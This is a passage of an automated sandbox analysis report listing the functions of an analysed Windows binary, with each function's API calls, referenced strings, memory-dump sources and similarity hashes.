_wcslen.LIBCMT ref: 0098CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0098D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0098D075

Strings

0, xrefs: 0098CF5A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: c9a8efac2dcf626cb135dec24cef003c184a605a2fd53fba2fede99515d18cae
Instruction ID: 9f3cfa4a673095f3df6312fcabafddb18660f24831b65a4de73d493ec0ca9e88
Opcode Fuzzy Hash: c9a8efac2dcf626cb135dec24cef003c184a605a2fd53fba2fede99515d18cae
Instruction Fuzzy Hash: 0E51CF7161A3009BE724BF28D845B6BB7E8AF89314F040A29FA95D33D1DB74CD458762

Function 009AB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 009AB903

Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF

GetProcessId.KERNEL32(00000000), ref: 009AB998
CloseHandle.KERNEL32(00000000), ref: 009AB9C7

Strings

<, xrefs: 009AB8CB
@, xrefs: 009AB8D2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 9aa471a757ae9523cc68b352b2901f9fcb2381206d4bdc8a92c961cd24bed4a2
Instruction ID: 73686c0cba2f94fde8206f21e7ec8a751bb7060fcbef8e4697787e488987b793
Opcode Fuzzy Hash: 9aa471a757ae9523cc68b352b2901f9fcb2381206d4bdc8a92c961cd24bed4a2
Instruction Fuzzy Hash: BC717875A00229DFCB10EF58C494A9EBBF4FF49314F048499E95AAB392CB34ED41CB90

Function 00987B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00987B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00987BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00987BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00987C36

Strings

DllGetClassObject, xrefs: 00987BA9

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 3e93a1a17fecdbfa4f1bbd4b9b42a46b1aa5ed0049f36c313ea56a424e69aff6
Instruction ID: 3fbcd43ad09ba259b97f029cd8e44dbf3ae99689739ae87340524f882038909f
Opcode Fuzzy Hash: 3e93a1a17fecdbfa4f1bbd4b9b42a46b1aa5ed0049f36c313ea56a424e69aff6
Instruction Fuzzy Hash: D4419171604208EFDB15EFA4D884B9ABBB9EF84314F2480ADE9059F345D7B0DD44DBA0

Function 009B4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B48D1
IsMenu.USER32(?), ref: 009B48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B492E
DrawMenuBar.USER32 ref: 009B4941

Strings

0, xrefs: 009B4825

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 2ecdaa916d6b06bf8a14a4d5088c25e08edc39fc84e957b075e066f1ffbdd80e
Instruction ID: fa94400ad7ac86f9679bc9437e26ffa5ac610f11e0340fd754b6541001ef65ce
Opcode Fuzzy Hash: 2ecdaa916d6b06bf8a14a4d5088c25e08edc39fc84e957b075e066f1ffbdd80e
Instruction Fuzzy Hash: 15416975A01209EFDB20CF51DA84EEABBB9FF06724F044129F94597251D370ED44EBA0

Function 0098272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009827B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009827C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 009827F6

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

Strings

ComboBox, xrefs: 0098273D
ListBox, xrefs: 00982772

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 14413840f07759b2b3120b9e6ff3aafa7c5aab96c833383fd5a80de75c09c59f
Instruction ID: 5ab8bc9019c2c63629faa5b375a5a98e15a6e46b0fc24f738d0d1aab1ba1b203
Opcode Fuzzy Hash: 14413840f07759b2b3120b9e6ff3aafa7c5aab96c833383fd5a80de75c09c59f
Instruction Fuzzy Hash: 23210771940104BEDB05AB60DC86DFF77B8DF853A0F104129F411972E1DB385D099B50

Function 009B39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009B3A29
LoadLibraryW.KERNEL32(?), ref: 009B3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009B3A45
DestroyWindow.USER32(?), ref: 009B3A4D

Strings

SysAnimate32, xrefs: 009B3A04

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: fb19e0b2857f9b00c384625eb1ac5b955324708fa775ba435ffda9b2601cdd39
Instruction ID: e4e9d479326b7f8aaa329c8bf997bb4445935b006536029843774e143d8dbbf0
Opcode Fuzzy Hash: fb19e0b2857f9b00c384625eb1ac5b955324708fa775ba435ffda9b2601cdd39
Instruction Fuzzy Hash: F421AC71604209EBEB10DFA4DD80FFB77ADEB88378F219618FA91961A0D771CD40A760

Function 009450DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0094508E,?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002), ref: 009450FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00945110
FreeLibrary.KERNEL32(00000000,?,?,?,0094508E,?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945133

Strings

mscoree.dll, xrefs: 009450F6
CorExitProcess, xrefs: 00945108

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fe2c831364dcb82f2df9534e7ca5dd56d09b0d3c6cb094cdddaf04f0c44a89ec
Instruction ID: 56cd7dfba581c95103684b7608df3b3e5aad4b3bee95f4017d680604695bbd9b
Opcode Fuzzy Hash: fe2c831364dcb82f2df9534e7ca5dd56d09b0d3c6cb094cdddaf04f0c44a89ec
Instruction Fuzzy Hash: F8F0C230A19208BFDB149F94DD49FADBFB8EF48726F000168F809A2161DB349E40DB95

Function 0092663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092665C
FreeLibrary.KERNEL32(00000000,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092666E

Strings

kernel32.dll, xrefs: 00926642
Wow64DisableWow64FsRedirection, xrefs: 00926656

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: c02b5fa74a5a900314d0478b269431f67132e715f863c1c4152443ef506e4aff
Instruction ID: cf4be082d4df5fc8771f9eb654bdefcfe742d2c7d09f57f19c3edb555b19048f
Opcode Fuzzy Hash: c02b5fa74a5a900314d0478b269431f67132e715f863c1c4152443ef506e4aff
Instruction Fuzzy Hash: 5DE0CD36A1B6321792171729BC0CB5E652CDFC2F36F050325FC00D2508EF54CC0280E5

Function 00926607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00926622
FreeLibrary.KERNEL32(00000000,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926635

Strings

Wow64RevertWow64FsRedirection, xrefs: 0092661C
kernel32.dll, xrefs: 00926609

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 68f60ae4f0484dd3ec70ba7edd2106cbe5671754fe5daf8ea14702bb1dea24ce
Instruction ID: ab266186912ca5d9a673ae135a72890fd70aaf06e362c464428bdfaff1b7a887
Opcode Fuzzy Hash: 68f60ae4f0484dd3ec70ba7edd2106cbe5671754fe5daf8ea14702bb1dea24ce
Instruction Fuzzy Hash: 7DD05B3562B63657523637297D1C9CF7B1C9ED1F313050129F800A611CEF64CD12D5D8

Function 00993306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009935C4
DeleteFileW.KERNEL32(?), ref: 00993646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0099365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0099366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0099367F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: f7e51dca15b91d8bc2eed1d45b75f70610772fd2ea430b84bc70ce79488203d9
Instruction ID: f6038c4b68a1e54a40927682205888b9dd9b64b6717fe9cb2818348ecd5bfef4
Opcode Fuzzy Hash: f7e51dca15b91d8bc2eed1d45b75f70610772fd2ea430b84bc70ce79488203d9
Instruction Fuzzy Hash: FEB14D72D01129ABDF15DFA8CC85FDEBBBDEF89314F0080A6F509E6151EA349B448B61

Function 009AADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009AAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009AAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009AAEC8
CloseHandle.KERNEL32(?), ref: 009AB09D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: a643156c72c331f56de23b625682d208dc5e81c4d9ffc9e6519efb3591f560d7
Instruction ID: 7b7bdaaa97ebfdc12630e97654d63c6034bea3903bc12b49f89c62b1a8b4f93c
Opcode Fuzzy Hash: a643156c72c331f56de23b625682d208dc5e81c4d9ffc9e6519efb3591f560d7
Instruction Fuzzy Hash: 99A19071A04311AFE720DF24D886B2AB7E5AF88714F14885DF5999B392D771EC40CB82

Function 009AC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009AC5C3
RegCloseKey.ADVAPI32(?,?), ref: 009AC606
RegCloseKey.ADVAPI32(00000000), ref: 009AC613

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 8745b9c3e6ceaec9d224bd2576d9dda604e0c9dd9a78f7976803986ed94ac0b5
Instruction ID: 8d644311eeab1437470fd842ae6ad1b277fe71bbb33a33ba4adda757ac350ff1
Opcode Fuzzy Hash: 8745b9c3e6ceaec9d224bd2576d9dda604e0c9dd9a78f7976803986ed94ac0b5
Instruction Fuzzy Hash: 7E61A171608241AFC714DF14C890F6ABBE9FF85308F54895CF09A8B2A2DB31ED45CB91

Function 0098ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0098D7CD,?), ref: 0098E714

Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0098D7CD,?), ref: 0098E72D

Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1

lstrcmpiW.KERNEL32(?,?), ref: 0098ED8A
MoveFileW.KERNEL32(?,?), ref: 0098EDC3
_wcslen.LIBCMT ref: 0098EF02
_wcslen.LIBCMT ref: 0098EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0098EF67

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 83c2b5c082d6cec5b18315f36cc03edd7c508b459b537bc01444262892b04dac
Instruction ID: f26322edc3cdccdac87aef83b1f2bc82274d2f9c572ee29df0dfebe2362e9f6d
Opcode Fuzzy Hash: 83c2b5c082d6cec5b18315f36cc03edd7c508b459b537bc01444262892b04dac
Instruction Fuzzy Hash: D85142B25083859BC724EB94DC91EDBB3ECAFC5350F00092EF689D3191EF75A6888756

Function 00989517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00989534
VariantClear.OLEAUT32 ref: 009895A5
VariantClear.OLEAUT32 ref: 00989604
VariantClear.OLEAUT32(?), ref: 00989677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009896A2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c89d6fd0ada9b0e43e788365ecbd3149db78f79c058d8d81ad78fca4ae8d200e
Instruction ID: c4dd41ae6fc2d931e67612a03e0548e1c45188807f6a26dec355b70ab36a9f3f
Opcode Fuzzy Hash: c89d6fd0ada9b0e43e788365ecbd3149db78f79c058d8d81ad78fca4ae8d200e
Instruction Fuzzy Hash: 5F5159B5A0061AAFCB10DF58C884EAAB7F9FF89310B058559E906DB310E734E911CF90

Function 00999540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009995F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0099961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00999677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0099969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009996A4

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 5faff70d7463b8bb81a4a496c7f4d2ce3f3f4df5d4c28deb6c5b461f361bc07c
Instruction ID: c24918aa26b82c0d7878d39de89dd71a57667189b01ed925c64e326dac5eed44
Opcode Fuzzy Hash: 5faff70d7463b8bb81a4a496c7f4d2ce3f3f4df5d4c28deb6c5b461f361bc07c
Instruction Fuzzy Hash: D2513C35A002159FCF05DF69C885E6ABBF5FF88314F098058E849AB362CB35ED41CB90

Function 009A9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 009A999D
GetProcAddress.KERNEL32(00000000,?), ref: 009A9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 009A9A49
GetProcAddress.KERNEL32(00000000,?), ref: 009A9A8F
FreeLibrary.KERNEL32(00000000), ref: 009A9AAF

Part of subcall function 0093F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00991A02,?,753CE610), ref: 0093F9F1
Part of subcall function 0093F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00980354,00000000,00000000,?,?,00991A02,?,753CE610,?,00980354), ref: 0093FA18

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: c979d1de801644e62d0094e97836435e500bf172139be8ca151a5cd4a3e00ef4
Instruction ID: c6e88ba9de107606bdd399bfa5c3d8d99f6ce06378304b5bd9b8102c01cb48e9
Opcode Fuzzy Hash: c979d1de801644e62d0094e97836435e500bf172139be8ca151a5cd4a3e00ef4
Instruction Fuzzy Hash: B4515B39605215DFCB00DF68C4849ADBBF4FF4A314B1581A9E80AAB762D731ED86CF81

Function 009B75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 009B766B
SetWindowLongW.USER32(?,000000EC,?), ref: 009B7682
